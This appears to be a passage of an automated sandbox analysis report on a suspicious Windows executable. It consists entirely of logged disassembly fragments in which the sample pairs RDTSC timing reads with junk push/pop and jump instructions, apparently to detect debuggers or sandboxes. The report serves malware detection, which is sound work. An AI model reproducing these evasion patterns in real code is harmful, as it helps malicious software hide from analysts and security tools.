Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF199B second address: EF19C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 jo 00007FAAACBBF225h 0x0000000d jmp 00007FAAACBBF203h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAAACBBF1FAh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF19C7 second address: EF19CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF1C72 second address: EF1C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FAAACBBF1F6h 0x0000000a jmp 00007FAAACBBF203h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF1C8F second address: EF1CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FAAAD0E3C61h 0x0000000c jmp 00007FAAAD0E3C60h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF1E4C second address: EF1E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF1F95 second address: EF1F9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF1F9B second address: EF1FAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007FAAACBBF1F6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF1FAB second address: EF1FDC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FAAAD0E3C66h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jc 00007FAAAD0E3C62h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FAAAD0E3C5Ah 0x0000001b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFBB9F second address: EFBBA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFBBA5 second address: EFBBAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFBBAA second address: EFBBB3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFBBB3 second address: EFBBC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FAAAD0E3C56h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFBBC4 second address: EFBBD0 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAAACBBF1F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF9E13 second address: EF9E19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF9E19 second address: EF9E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FAAACBBF1FEh 0x0000000b push edi 0x0000000c jo 00007FAAACBBF1F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA0C0 second address: EFA0DD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAAAD0E3C67h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA0DD second address: EFA0EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jng 00007FAAACBBF1F6h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA24E second address: EFA252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA252 second address: EFA256 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA256 second address: EFA26B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAAAD0E3C5Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA26B second address: EFA26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA405 second address: EFA412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007FAAAD0E3C56h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA412 second address: EFA436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 jng 00007FAAACBBF1F6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FAAACBBF1FAh 0x00000018 jno 00007FAAACBBF1F8h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA436 second address: EFA448 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 jl 00007FAAAD0E3C56h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA5F7 second address: EFA601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA601 second address: EFA609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA74C second address: EFA762 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF1FEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA762 second address: EFA781 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFA781 second address: EFA787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFAA50 second address: EFAA5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jno 00007FAAAD0E3C58h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFAA5F second address: EFAA67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFAA67 second address: EFAA6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFABAC second address: EFABB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFABB0 second address: EFABB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFBA4D second address: EFBA5E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FAAACBBF1FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EF9817 second address: EF9821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FAAAD0E3C56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFE0F9 second address: EFE0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFE0FF second address: EFE10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FAAAD0E3C56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFE10E second address: EFE13F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF205h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAACBBF204h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: EFE13F second address: EFE143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F02BC5 second address: F02BC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F02BC9 second address: F02BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F02D06 second address: F02D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FAAACBBF1F8h 0x0000000c jnc 00007FAAACBBF1FCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F02E8B second address: F02EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jmp 00007FAAAD0E3C66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F02EAC second address: F02EB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F02EB7 second address: F02ED0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C5Fh 0x00000007 jns 00007FAAAD0E3C56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F02ED0 second address: F02ED5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F0E76F second address: F0E779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F10A0C second address: F10A12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F10A12 second address: F10A4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAAAD0E3C5Ch 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d jno 00007FAAAD0E3C56h 0x00000013 pop edi 0x00000014 jnl 00007FAAAD0E3C61h 0x0000001a popad 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jc 00007FAAAD0E3C56h 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F1334E second address: F13356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F13356 second address: F1335E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F1335E second address: F13368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F13497 second address: F1349C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F1349C second address: F134A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jbe 00007FAAACBBF1F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F18B78 second address: F18B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FAAAD0E3C5Dh 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F18B8E second address: F18BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007FAAACBBF210h 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F24E51 second address: F24E55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E484DB second address: E484E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: E484E1 second address: E4850D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAD0E3C65h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push ebx 0x0000000d pushad 0x0000000e jnp 00007FAAAD0E3C56h 0x00000014 jc 00007FAAAD0E3C56h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2FD17 second address: F2FD29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FAAACBBF1F6h 0x0000000a jg 00007FAAACBBF1F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2FD29 second address: F2FD3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007FAAAD0E3C58h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2FD3B second address: F2FD57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF208h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2E7AD second address: F2E7B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2E7B3 second address: F2E7D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FAAACBBF1F6h 0x0000000a jns 00007FAAACBBF1F6h 0x00000010 popad 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FAAACBBF1FDh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2E7D4 second address: F2E7DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EBD9 second address: F2EBDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EBDD second address: F2EBE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EBE1 second address: F2EBF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jl 00007FAAACBBF1F6h 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EBF7 second address: F2EBFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EBFB second address: F2EC1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007FAAACBBF1FAh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EC1A second address: F2EC1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EC1F second address: F2EC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FAAACBBF202h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2EC40 second address: F2EC46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2FA21 second address: F2FA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F2FA26 second address: F2FA34 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FAAAD0E3C58h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F33C92 second address: F33C98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F33C98 second address: F33C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F859B8 second address: F859D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAACBBF209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F856BB second address: F856D1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAAAD0E3C56h 0x00000008 jns 00007FAAAD0E3C56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: F856D1 second address: F85736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FAAACBBF209h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007FAAACBBF210h 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 jmp 00007FAAACBBF202h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push ecx 0x0000001e jg 00007FAAACBBF1F6h 0x00000024 pushad 0x00000025 popad 0x00000026 pop ecx 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 105354D second address: 1053553 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 1053553 second address: 105355D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAAACBBF1F6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exeRDTSC instruction interceptor: First address: 105355D second address: 1053567 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAAAD0E3C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 1053567 second address: 1053578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 1053578 second address: 105357F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 105357F second address: 10535AE instructions: 0x00000000 rdtsc 0x00000002 js 00007FAAACBBF212h 0x00000008 jmp 00007FAAACBBF202h 0x0000000d jmp 00007FAAACBBF1FAh 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 jnc 00007FAAACBBF1F6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 105263C second address: 1052640 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 1052640 second address: 1052646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 1052646 second address: 105264B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Bo6uO5gKL4.exe RDTSC instruction interceptor: First address: 105264B second address: 1052651 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
